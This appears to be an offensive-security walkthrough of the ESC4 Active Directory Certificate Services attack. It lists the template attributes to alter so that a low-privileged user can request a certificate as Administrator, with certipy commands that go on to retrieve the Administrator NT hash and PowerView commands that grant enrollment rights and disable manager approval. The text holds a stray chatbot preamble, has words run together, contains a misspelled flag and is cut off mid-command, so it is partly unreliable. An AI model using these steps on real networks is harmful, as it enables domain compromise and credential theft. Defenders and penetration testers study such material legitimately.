ESC4
Certainly! Here's the modified and formatted version:
ESC4
ESC4 Abuse Requirements
To perform an ESC4
attack, one must have extensive rights over the certificate templates. By manipulating these objects, it's possible to introduce misconfigurations to a non-vulnerable template. For instance, enabling the mspki-certificate-name-flag
flag for a template that permits domain authentication can lead to a domain compromise scenario, similar to ESC1
, where low-privileged users can specify an arbitrary Subject Alternative Name
and authenticate as someone else.
To make a template vulnerable, modify the following attributes with the specified values:
- Grant Enrollment rights for the vulnerable template.
- Disable the
PEND_ALL_REQUESTS
flag inmspki-enrollment-flag
to deactivate Manager Approval. - Set the
mspki-ra-signature
attribute to0
to disable the Authorized Signature requirement. - Enable the
ENROLLEE_SUPPLIES_SUBJECT
flag inmspki-certificate-name-flag
to allow requesting users to specify another privileged account name as a SAN. - Set the
mspki-certificate-application-policy
to a certificate purpose for authentication:- Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
- Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
- PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
- Any Purpose (OID: 2.5.29.37.0)
- No Extended Key Usage (EKU)
Linux
Attacking ESC4 vulnerable template
PS /home/bobbuilder> certipy template -u 'user1@local.lab' -p 'password1' -template Template4 -save-ol -dc-ip 10.10.10.10
ESC4 Template after modification
PS /home/bobbuilder> certipy find -u 'user1@local.lab' -p 'password1' -vulnerable -stdout -dc-ip 10.10.10.10
Abusing the modified template
PS /home/bobbuilder> certipy req -u 'user1@local.lab' -p 'password1' -ca lab-LAB-DC-CA -template Template4 -upn Administrator
Retrieve Administrator NT Hash
PS /home/bobbuilder> certipy auth -pfx administrator.pfx -username Administrator -domain local.lab
Restore template configuration
PS /home/bobbuilder> certipy template -u 'user1@local.lab' -p 'password1' -template Template4 -configuration Template4.json
- Create template
PS /home/bobbuilder> certipy template -u "user1@local.lab" -p "password1" -template SSL -save-old -dc-ip 10.10.10.10
- Restore
PS /home/bobbuilder> certipy template -u "user1@local.lab" -p "password1" -template SSL -configuration SSL.json -dc-ip 10.10.10.10
Windows
Import-Module PowerView
PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> Import-Module .\PowerView.ps1
Add Certificate-Enrollment rights (to the Domain Users
group)
PS /home/bobbuilder> Add-DomainObjectAcl -TargetIdentity Template4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=lab,DC=local" -Verbose
Disabling Manager Approval Requirement
To disable the manager approval requirement, use the following PowerShell commands:
PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity Template4 -Set @{'mspki-enrollment-flag'=9} -Verbose
Disabling Authorized Signature Requirement
To disable the authorized signature requirement, set mspki-ra-signature
attribute to 0
:
PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab